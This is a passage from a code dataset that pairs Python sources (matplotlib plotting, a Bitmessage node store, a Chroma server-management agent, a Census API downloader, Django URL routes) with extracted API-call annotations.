fig.suptitle('Plotting rectangle.')\n fig.subplots_adjust(top=0.85)\n\n plt.subplot(1, 1, 1)\n plt.imshow(img, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))\n plt.show()\n\n def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):\n fig = plt.figure(figsize=(12, 3))\n fig.suptitle('check if the generated imgs match to the test_X slice image')\n fig.subplots_adjust(top=0.85)\n\n plt.subplot(1, 2, 1)\n plt.gca().set_title('Returned by the dataset class: used for training')\n plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n\n plt.subplot(1, 2, 2)\n plt.gca().set_title('Global image holder: used for plotting.')\n plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n plt.show()\n print('compare:',test_X_sample,test_imgs_sample)\n\n def show_predicted(self, pred_bboxes):\n # Show a few images and predicted bounding boxes from the test dataset.\n\n fig = plt.figure(figsize=(12, 3))\n fig.subplots_adjust(top=0.85)\n fig.suptitle('Prediction demonstration. Random samples.')\n legend_plotted = False\n\n for i_subplot in range(1, 11):\n plt.subplot(1, 10, i_subplot)\n i = np.random.randint(len(pred_bboxes))\n plt.imshow(self.test_imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n for pred_bbox, exp_bbox in zip(pred_bboxes[i], self.test_bboxes[i]):\n # print('before convertion: pred',pred_bbox, 'gt',exp_bbox)\n pred_bbox = self.convertDefaultAnnotToCoord(pred_bbox)\n # exp_bbox = self.convertDefaultAnnotToCoord(exp_bbox)\n print('after convertion: pred',pred_bbox, 'gt',exp_bbox)\n plt.gca().add_patch(matplotlib.patches.Rectangle((pred_bbox[0], pred_bbox[1]), pred_bbox[2], pred_bbox[3], ec='r', fc='none'))\n #gt\n plt.gca().add_patch(matplotlib.patches.Rectangle((exp_bbox[0], exp_bbox[1]), exp_bbox[2], exp_bbox[3], ec='b', fc='none'))\n plt.annotate('IOU: {:.2f}'.format(self.IOU(pred_bbox, exp_bbox)), (pred_bbox[0], pred_bbox[1]+pred_bbox[3]+0.2), color='r')\n if not legend_plotted:\n legend_plotted = True\n plt.gca().legend(['Pred','GT'],loc='upper center', bbox_to_anchor=(0.5, -0.5), fancybox=True)\n plt.show()\n # plt.savefig('plots/bw-single-rectangle_prediction_{0:%Y-%m-%d%H:%M:%S}.png'.format(datetime.datetime.now()), dpi=300)\n"},"apis":{"kind":"list like","value":["matplotlib.pyplot.imshow","matplotlib.patches.Rectangle","matplotlib.pyplot.gca","numpy.zeros","matplotlib.pyplot.figure","numpy.random.randint","matplotlib.pyplot.subplot","matplotlib.pyplot.show"],"string":"[\n \"matplotlib.pyplot.imshow\",\n \"matplotlib.patches.Rectangle\",\n \"matplotlib.pyplot.gca\",\n \"numpy.zeros\",\n \"matplotlib.pyplot.figure\",\n \"numpy.random.randint\",\n \"matplotlib.pyplot.subplot\",\n \"matplotlib.pyplot.show\"\n]"},"extract_api":{"kind":"string","value":"[((440, 476), 'numpy.zeros', 'np.zeros', (['(num_imgs, num_objects, 4)'], {}), '((num_imgs, num_objects, 4))\\n', (448, 476), True, 'import numpy as np\\n'), ((497, 542), 'numpy.zeros', 'np.zeros', (['(num_imgs, self.WIDTH, self.HEIGHT)'], {}), '((num_imgs, self.WIDTH, self.HEIGHT))\\n', (505, 542), True, 'import numpy as np\\n'), ((1662, 1689), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\\n', (1672, 1689), True, 'import matplotlib.pyplot as plt\\n'), ((1821, 1841), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\\n', (1832, 1841), True, 'import matplotlib.pyplot as plt\\n'), ((1930, 2052), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(test_X_sample, cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (1940, 2052), True, 'import matplotlib.pyplot as plt\\n'), ((2057, 2077), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\\n', (2068, 2077), True, 'import matplotlib.pyplot as plt\\n'), ((2157, 2282), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(test_imgs_sample, cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (2167, 2282), True, 'import matplotlib.pyplot as plt\\n'), ((2286, 2296), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (2294, 2296), True, 'import matplotlib.pyplot as plt\\n'), ((3515, 3527), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (3525, 3527), True, 'import matplotlib.pyplot as plt\\n'), ((3626, 3746), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.imgs[i]'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(self.imgs[i], cmap='Greys', interpolation='none', origin='lower',\\n extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (3636, 3746), True, 'import matplotlib.pyplot as plt\\n'), ((3943, 3953), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (3951, 3953), True, 'import matplotlib.pyplot as plt\\n'), ((4011, 4023), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (4021, 4023), True, 'import matplotlib.pyplot as plt\\n'), ((4115, 4135), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(1)', '(1)'], {}), '(1, 1, 1)\\n', (4126, 4135), True, 'import matplotlib.pyplot as plt\\n'), ((4144, 4256), 'matplotlib.pyplot.imshow', 'plt.imshow', (['img'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(img, cmap='Greys', interpolation='none', origin='lower', extent=\\n [0, self.WIDTH, 0, self.HEIGHT])\\n\", (4154, 4256), True, 'import matplotlib.pyplot as plt\\n'), ((4375, 4385), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (4383, 4385), True, 'import matplotlib.pyplot as plt\\n'), ((4481, 4508), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\\n', (4491, 4508), True, 'import matplotlib.pyplot as plt\\n'), ((4640, 4660), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\\n', (4651, 4660), True, 'import matplotlib.pyplot as plt\\n'), ((4749, 4871), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(test_X_sample, cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (4759, 4871), True, 'import matplotlib.pyplot as plt\\n'), ((4876, 4896), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\\n', (4887, 4896), True, 'import matplotlib.pyplot as plt\\n'), ((4976, 5101), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(test_imgs_sample, cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (4986, 5101), True, 'import matplotlib.pyplot as plt\\n'), ((5105, 5115), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (5113, 5115), True, 'import matplotlib.pyplot as plt\\n'), ((5312, 5339), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\\n', (5322, 5339), True, 'import matplotlib.pyplot as plt\\n'), ((6760, 6770), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (6768, 6770), True, 'import matplotlib.pyplot as plt\\n'), ((4280, 4369), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '\"\"\"r\"\"\"', 'fc': '\"\"\"none\"\"\"'}), \"((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\\n fc='none')\\n\", (4308, 4369), False, 'import matplotlib\\n'), ((5527, 5556), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(10)', 'i_subplot'], {}), '(1, 10, i_subplot)\\n', (5538, 5556), True, 'import matplotlib.pyplot as plt\\n'), ((5621, 5747), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.test_imgs[i]'], {'cmap': '\"\"\"Greys\"\"\"', 'interpolation': '\"\"\"none\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), \"(self.test_imgs[i], cmap='Greys', interpolation='none', origin=\\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\\n\", (5631, 5747), True, 'import matplotlib.pyplot as plt\\n'), ((676, 735), 'numpy.random.randint', 'np.random.randint', (['min_object_size', 'max_object_size'], {'size': '(2)'}), '(min_object_size, max_object_size, size=2)\\n', (693, 735), True, 'import numpy as np\\n'), ((756, 792), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.WIDTH - w)'], {}), '(0, self.WIDTH - w)\\n', (773, 792), True, 'import numpy as np\\n'), ((813, 850), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.HEIGHT - h)'], {}), '(0, self.HEIGHT - h)\\n', (830, 850), True, 'import numpy as np\\n'), ((1850, 1859), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (1857, 1859), True, 'import matplotlib.pyplot as plt\\n'), ((2086, 2095), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (2093, 2095), True, 'import matplotlib.pyplot as plt\\n'), ((3811, 3900), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '\"\"\"r\"\"\"', 'fc': '\"\"\"none\"\"\"'}), \"((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\\n fc='none')\\n\", (3839, 3900), False, 'import matplotlib\\n'), ((4260, 4269), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (4267, 4269), True, 'import matplotlib.pyplot as plt\\n'), ((4669, 4678), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (4676, 4678), True, 'import matplotlib.pyplot as plt\\n'), ((4905, 4914), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (4912, 4914), True, 'import matplotlib.pyplot as plt\\n'), ((3791, 3800), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (3798, 3800), True, 'import matplotlib.pyplot as plt\\n'), ((3910, 3919), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (3917, 3919), True, 'import matplotlib.pyplot as plt\\n'), ((6151, 6260), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(pred_bbox[0], pred_bbox[1])', 'pred_bbox[2]', 'pred_bbox[3]'], {'ec': '\"\"\"r\"\"\"', 'fc': '\"\"\"none\"\"\"'}), \"((pred_bbox[0], pred_bbox[1]), pred_bbox[2],\\n pred_bbox[3], ec='r', fc='none')\\n\", (6179, 6260), False, 'import matplotlib\\n'), ((6314, 6419), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(exp_bbox[0], exp_bbox[1])', 'exp_bbox[2]', 'exp_bbox[3]'], {'ec': '\"\"\"b\"\"\"', 'fc': '\"\"\"none\"\"\"'}), \"((exp_bbox[0], exp_bbox[1]), exp_bbox[2],\\n exp_bbox[3], ec='b', fc='none')\\n\", (6342, 6419), False, 'import matplotlib\\n'), ((6131, 6140), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (6138, 6140), True, 'import matplotlib.pyplot as plt\\n'), ((6294, 6303), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (6301, 6303), True, 'import matplotlib.pyplot as plt\\n'), ((6658, 6667), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (6665, 6667), True, 'import matplotlib.pyplot as plt\\n')]"}}},{"rowIdx":776,"cells":{"code":{"kind":"string","value":"import pickle\nimport threading\n\nfrom bmconfigparser import BMConfigParser\nimport state\n\nknownNodesLock = threading.Lock()\nknownNodes = {}\n\nknownNodesTrimAmount = 2000\n\ndef saveKnownNodes(dirName = None):\n if dirName is None:\n dirName = state.appdata\n with knownNodesLock:\n with open(dirName + 'knownnodes.dat', 'wb') as output:\n pickle.dump(knownNodes, output)\n\ndef increaseRating(peer):\n increaseAmount = 0.1\n maxRating = 1\n with knownNodesLock:\n for stream in knownNodes.keys():\n try:\n knownNodes[stream][peer][\"rating\"] = min(knownNodes[stream][peer][\"rating\"] + increaseAmount, maxRating)\n except KeyError:\n pass\n\ndef decreaseRating(peer):\n decreaseAmount = 0.1\n minRating = -1\n with knownNodesLock:\n for stream in knownNodes.keys():\n try:\n knownNodes[stream][peer][\"rating\"] = max(knownNodes[stream][peer][\"rating\"] - decreaseAmount, minRating)\n except KeyError:\n pass\n\ndef trimKnownNodes(recAddrStream = 1):\n if len(knownNodes[recAddrStream]) < BMConfigParser().get(\"knownnodes\", \"maxnodes\"):\n return\n with knownNodesLock:\n oldestList = sorted(knownNodes[recAddrStream], key=lambda x: x['lastseen'])[:knownNodesTrimAmount]\n for oldest in oldestList:\n del knownNodes[recAddrStream][oldest]\n"},"apis":{"kind":"list like","value":["bmconfigparser.BMConfigParser","threading.Lock","pickle.dump"],"string":"[\n \"bmconfigparser.BMConfigParser\",\n \"threading.Lock\",\n \"pickle.dump\"\n]"},"extract_api":{"kind":"string","value":"[((105, 121), 'threading.Lock', 'threading.Lock', ([], {}), '()\\n', (119, 121), False, 'import threading\\n'), ((360, 391), 'pickle.dump', 'pickle.dump', (['knownNodes', 'output'], {}), '(knownNodes, output)\\n', (371, 391), False, 'import pickle\\n'), ((1121, 1137), 'bmconfigparser.BMConfigParser', 'BMConfigParser', ([], {}), '()\\n', (1135, 1137), False, 'from bmconfigparser import BMConfigParser\\n')]"}}},{"rowIdx":777,"cells":{"code":{"kind":"string","value":"# Copyright (c) 2018 DDN. All rights reserved.\n# Use of this source code is governed by a MIT-style\n# license that can be found in the LICENSE file.\n\n\nimport os\n\nfrom chroma_agent.lib.shell import AgentShell\nfrom chroma_agent.log import console_log\nfrom chroma_agent.device_plugins.action_runner import CallbackAfterResponse\nfrom chroma_agent.lib.pacemaker import PacemakerConfig\n\n\ndef ssi(runlevel):\n # force a manual failover by failing a node\n AgentShell.try_run([\"sync\"])\n AgentShell.try_run([\"sync\"])\n AgentShell.try_run([\"init\", runlevel])\n\n\ndef fail_node():\n ssi(\"0\")\n\n\ndef stonith(node):\n p_cfg = PacemakerConfig()\n\n # TODO: signal that manager that a STONITH has been done so that it\n # doesn't treat it as an AWOL\n console_log.info(\"Rebooting %s per a STONITH request\" % node)\n\n p_cfg.get_node(node).fence_reboot()\n\n\ndef shutdown_server(halt=True, at_time=\"now\"):\n def _shutdown():\n console_log.info(\"Initiating server shutdown per manager request\")\n # This will initiate a \"nice\" shutdown with a wall from root, etc.\n AgentShell.try_run([\"shutdown\", \"-H\" if halt else \"-h\", at_time])\n\n console_log.info(\"Terminating\")\n os._exit(0)\n\n raise CallbackAfterResponse(None, _shutdown)\n\n\ndef reboot_server(at_time=\"now\"):\n def _reboot():\n console_log.info(\"Initiating server reboot per manager request\")\n # reboot(8) just calls shutdown anyhow.\n AgentShell.try_run([\"shutdown\", \"-r\", at_time])\n\n console_log.info(\"Terminating\")\n os._exit(0)\n\n raise CallbackAfterResponse(None, _reboot)\n\n\nACTIONS = [reboot_server, shutdown_server, fail_node, stonith]\n"},"apis":{"kind":"list like","value":["chroma_agent.lib.shell.AgentShell.try_run","chroma_agent.lib.pacemaker.PacemakerConfig","os._exit","chroma_agent.log.console_log.info","chroma_agent.device_plugins.action_runner.CallbackAfterResponse"],"string":"[\n \"chroma_agent.lib.shell.AgentShell.try_run\",\n \"chroma_agent.lib.pacemaker.PacemakerConfig\",\n \"os._exit\",\n \"chroma_agent.log.console_log.info\",\n \"chroma_agent.device_plugins.action_runner.CallbackAfterResponse\"\n]"},"extract_api":{"kind":"string","value":"[((453, 481), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['sync']\"], {}), \"(['sync'])\\n\", (471, 481), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((486, 514), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['sync']\"], {}), \"(['sync'])\\n\", (504, 514), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((519, 557), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['init', runlevel]\"], {}), \"(['init', runlevel])\\n\", (537, 557), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((623, 640), 'chroma_agent.lib.pacemaker.PacemakerConfig', 'PacemakerConfig', ([], {}), '()\\n', (638, 640), False, 'from chroma_agent.lib.pacemaker import PacemakerConfig\\n'), ((758, 819), 'chroma_agent.log.console_log.info', 'console_log.info', ([\"('Rebooting %s per a STONITH request' % node)\"], {}), \"('Rebooting %s per a STONITH request' % node)\\n\", (774, 819), False, 'from chroma_agent.log import console_log\\n'), ((1227, 1265), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_shutdown'], {}), '(None, _shutdown)\\n', (1248, 1265), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\\n'), ((1570, 1606), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_reboot'], {}), '(None, _reboot)\\n', (1591, 1606), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\\n'), ((939, 1005), 'chroma_agent.log.console_log.info', 'console_log.info', (['\"\"\"Initiating server shutdown per manager request\"\"\"'], {}), \"('Initiating server shutdown per manager request')\\n\", (955, 1005), False, 'from chroma_agent.log import console_log\\n'), ((1089, 1154), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['shutdown', '-H' if halt else '-h', at_time]\"], {}), \"(['shutdown', '-H' if halt else '-h', at_time])\\n\", (1107, 1154), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((1164, 1195), 'chroma_agent.log.console_log.info', 'console_log.info', (['\"\"\"Terminating\"\"\"'], {}), \"('Terminating')\\n\", (1180, 1195), False, 'from chroma_agent.log import console_log\\n'), ((1204, 1215), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\\n', (1212, 1215), False, 'import os\\n'), ((1329, 1393), 'chroma_agent.log.console_log.info', 'console_log.info', (['\"\"\"Initiating server reboot per manager request\"\"\"'], {}), \"('Initiating server reboot per manager request')\\n\", (1345, 1393), False, 'from chroma_agent.log import console_log\\n'), ((1450, 1497), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', ([\"['shutdown', '-r', at_time]\"], {}), \"(['shutdown', '-r', at_time])\\n\", (1468, 1497), False, 'from chroma_agent.lib.shell import AgentShell\\n'), ((1507, 1538), 'chroma_agent.log.console_log.info', 'console_log.info', (['\"\"\"Terminating\"\"\"'], {}), \"('Terminating')\\n\", (1523, 1538), False, 'from chroma_agent.log import console_log\\n'), ((1547, 1558), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\\n', (1555, 1558), False, 'import os\\n')]"}}},{"rowIdx":778,"cells":{"code":{"kind":"string","value":"#! /usr/bin/env python\n# -*- coding: utf-8 -*\n\"\"\"\nA base class that governs how to download and process tables from a Census API table.\n\"\"\"\nimport os\nimport logging\nimport pathlib\nfrom . import geotypes\nfrom . import decorators\nlogger = logging.getLogger(__name__)\n\n\nclass BaseTableConfig(object):\n \"\"\"\n Configures how to download and process tables from the Census API.\n \"\"\"\n THIS_DIR = pathlib.Path(__file__).parent\n PARENT_DIR = THIS_DIR.parent\n # All available years\n YEAR_LIST = [\n 2017,\n 2016,\n 2015,\n 2014,\n 2013,\n 2012,\n 2011,\n 2010,\n 2009\n ]\n # All available geographies\n GEOTYPE_LIST = (\n \"nationwide\",\n \"regions\",\n \"divisions\",\n \"states\",\n \"congressional_districts\",\n \"state_legislative_upper_districts\",\n \"state_legislative_lower_districts\",\n \"counties\",\n \"places\",\n \"urban_areas\",\n \"msas\",\n \"csas\",\n \"pumas\",\n \"nectas\",\n \"cnectas\",\n \"aiannh_homelands\",\n \"tracts\",\n \"zctas\",\n \"unified_school_districts\",\n \"elementary_school_districts\",\n \"secondary_school_districts\"\n )\n\n def __init__(\n self,\n api_key=None,\n source=\"acs5\",\n years=None,\n data_dir=None,\n force=False\n ):\n \"\"\"\n Configuration.\n \"\"\"\n # Set the inputs\n self.CENSUS_API_KEY = os.getenv(\"CENSUS_API_KEY\", api_key)\n if not self.CENSUS_API_KEY:\n raise NotImplementedError(\"Census API key required. Pass it as the first argument.\")\n self.source = source\n self.force = force\n\n #\n # Allow custom years for data download, defaulting to most recent year\n #\n\n # If they want all the years, give it to them.\n if years == \"all\":\n self.years_to_download = self.YEAR_LIST\n # If the user provides a year give them that.\n elif isinstance(years, int):\n self.years_to_download = [years]\n # Or if they provide years as a list, give those then.\n elif isinstance(years, list):\n self.years_to_download = list(map(int, years))\n # If they provided nothing, default to the latest year of data\n elif years is None:\n self.years_to_download = [max(self.YEAR_LIST), ]\n\n # Validate the years\n for year in self.years_to_download:\n if year not in self.YEAR_LIST:\n error_msg = (\"Data only available for the years\"\n f\"{self.YEAR_LIST[-1]}-{self.YEAR_LIST[0]}.\")\n raise NotImplementedError(error_msg)\n\n # Set the data directories\n if data_dir:\n self.data_dir = pathlib.Path(str(data_dir))\n else:\n self.data_dir = self.PARENT_DIR.joinpath(\"data\")\n self.raw_data_dir = self.data_dir.joinpath(\"raw\")\n self.processed_data_dir = self.data_dir.joinpath(\"processed\")\n\n # Make sure they exist\n if not self.data_dir.exists():\n self.data_dir.mkdir()\n if not self.raw_data_dir.exists():\n self.raw_data_dir.mkdir()\n if not self.processed_data_dir.exists():\n self.processed_data_dir.mkdir()\n\n @property\n def censusreporter_url(self):\n \"\"\"\n Returns the URL of the Census Reporter page explaining the ACS table.\n \"\"\"\n return f\"https://censusreporter.org/tables/{self.RAW_TABLE_NAME}/\"\n\n #\n # Geotype downloaders\n #\n\n @decorators.downloader\n def download_nationwide(self):\n \"\"\"\n Download nationwide data.\n \"\"\"\n return geotypes.NationwideDownloader\n\n @decorators.downloader\n def download_regions(self):\n \"\"\"\n Download data for all regions.\n \"\"\"\n return geotypes.RegionsDownloader\n\n @decorators.downloader\n def download_divisions(self):\n \"\"\"\n Download data for all divisions.\n \"\"\"\n return geotypes.DivisionsDownloader\n\n @decorators.downloader\n def download_states(self):\n \"\"\"\n Download data for all states.\n \"\"\"\n return geotypes.StatesDownloader\n\n @decorators.downloader\n def download_congressional_districts(self):\n \"\"\"\n Download data for all Congressional districts.\n \"\"\"\n return geotypes.CongressionalDistrictsDownloader\n\n @decorators.downloader\n def download_state_legislative_upper_districts(self):\n \"\"\"\n Download data for all Census upper legislative districts in the provided state.\n \"\"\"\n return geotypes.StateLegislativeUpperDistrictsDownloader\n\n @decorators.downloader\n def download_state_legislative_lower_districts(self):\n \"\"\"\n Download data for all Census lower legislative districts in the provided state.\n \"\"\"\n return geotypes.StateLegislativeLowerDistrictsDownloader\n\n @decorators.downloader\n def download_counties(self):\n \"\"\"\n Download data for all counties.\n \"\"\"\n return geotypes.CountiesDownloader\n\n @decorators.downloader\n def download_places(self):\n \"\"\"\n Download data for all Census designated places.\n \"\"\"\n return geotypes.PlacesDownloader\n\n @decorators.downloader\n def download_urban_areas(self):\n \"\"\"\n Download data for all urban areas\n \"\"\"\n return geotypes.UrbanAreasDownloader\n\n @decorators.downloader\n def download_msas(self):\n \"\"\"\n Download data for Metropolitian Statistical Areas.\n \"\"\"\n return geotypes.MsasDownloader\n\n @decorators.downloader\n def download_csas(self):\n \"\"\"\n Download data for Combined Statistical Areas.\n \"\"\"\n return geotypes.CsasDownloader\n\n @decorators.downloader\n def download_pumas(self):\n \"\"\"\n Download data for Public Use Microdata Areas.\n \"\"\"\n return geotypes.PumasDownloader\n\n @decorators.downloader\n def download_nectas(self):\n \"\"\"\n Download data for New England cities and towns.\n \"\"\"\n return geotypes.NectasDownloader\n\n @decorators.downloader\n def download_cnectas(self):\n \"\"\"\n Download data for combined New England cities and towns.\n \"\"\"\n return geotypes.CnectasDownloader\n\n @decorators.downloader\n def download_aiannh_homelands(self):\n \"\"\"\n Download data for American Indian home lands.\n \"\"\"\n return geotypes.AiannhHomelandsDownloader\n\n @decorators.downloader\n def download_tracts(self):\n \"\"\"\n Download data for all Census tracts in the provided state.\n \"\"\"\n return geotypes.TractsDownloader\n\n @decorators.downloader\n def download_zctas(self):\n \"\"\"\n Download data for Zip Code Tabulation Areas\n \"\"\"\n return geotypes.ZctasDownloader\n\n @decorators.downloader\n def download_unified_school_districts(self):\n \"\"\"\n Download data for unified school districts.\n \"\"\"\n return geotypes.UnifiedSchoolDistrictsDownloader\n\n @decorators.downloader\n def download_elementary_school_districts(self):\n \"\"\"\n Download data for elementary school districts.\n \"\"\"\n return geotypes.ElementarySchoolDistrictsDownloader\n\n @decorators.downloader\n def download_secondary_school_districts(self):\n \"\"\"\n Download data for secondary school districts.\n \"\"\"\n return geotypes.SecondarySchoolDistrictsDownloader\n\n def download_everything(self):\n \"\"\"\n Download 'em all.\n \"\"\"\n for geo in self.GEOTYPE_LIST:\n print(geo)\n # Get the downloader function\n dl = getattr(self, f\"download_{geo}\", None)\n # Validate it\n if not dl or not callable(dl):\n raise NotImplementedError(f\"Invalid geography type: {geo}\")\n # Run it\n try:\n dl()\n except NotImplementedError:\n pass\n"},"apis":{"kind":"list like","value":["logging.getLogger","os.getenv","pathlib.Path"],"string":"[\n \"logging.getLogger\",\n \"os.getenv\",\n \"pathlib.Path\"\n]"},"extract_api":{"kind":"string","value":"[((237, 264), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\\n', (254, 264), False, 'import logging\\n'), ((400, 422), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\\n', (412, 422), False, 'import pathlib\\n'), ((1474, 1510), 'os.getenv', 'os.getenv', (['\"\"\"CENSUS_API_KEY\"\"\"', 'api_key'], {}), \"('CENSUS_API_KEY', api_key)\\n\", (1483, 1510), False, 'import os\\n')]"}}},{"rowIdx":779,"cells":{"code":{"kind":"string","value":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n url(r'^settings$', views.household_dashboard, name='household_dashboard'),\n url(r'^myinfo$', views.my_info, name='my_info'),\n url(r'^profile$', views.household_profile, name='maintain_household'),\n url(r'^members$', views.household_members, name='maintain_members'),\n url(r'^vehicles$', views.household_vehicles, name='maintain_vehicles'),\n url(r'^ajax/models-by-make/(?P\\d+)/$', views.ajax_models_by_make),\n url(r'^ajax/makes-by-type/(?P\\d+)/$', views.ajax_makes_by_type),\n url(r'^ajax/add-make/(?P\\d+)/(?P[\\w ]{1,50})/$', views.ajax_add_make),\n url(r'^ajax/add-model/(?P\\d+)/(?P[\\w -]{1,128})/$', views.ajax_add_model),\n url(r'^ajax/delete-invite/$', views.ajax_delete_invite),\n url(r'^ajax/change-member-status/$', views.ajax_change_member_status),\n]\n"},"apis":{"kind":"list like","value":["django.conf.urls.url"],"string":"[\n \"django.conf.urls.url\"\n]"},"extract_api":{"kind":"string","value":"[((83, 155), 'django.conf.urls.url', 'url', (['\"\"\"^settings$\"\"\"', 'views.household_dashboard'], {'name': '\"\"\"household_dashboard\"\"\"'}), \"('^settings$', views.household_dashboard, name='household_dashboard')\\n\", (86, 155), False, 'from django.conf.urls import include, url\\n'), ((162, 208), 'django.conf.urls.url', 'url', (['\"\"\"^myinfo$\"\"\"', 'views.my_info'], {'name': '\"\"\"my_info\"\"\"'}), \"('^myinfo$', views.my_info, name='my_info')\\n\", (165, 208), False, 'from django.conf.urls import include, url\\n'), ((215, 283), 'django.conf.urls.url', 'url', (['\"\"\"^profile$\"\"\"', 'views.household_profile'], {'name': '\"\"\"maintain_household\"\"\"'}), \"('^profile$', views.household_profile, name='maintain_household')\\n\", (218, 283), False, 'from django.conf.urls import include, url\\n'), ((290, 356), 'django.conf.urls.url', 'url', 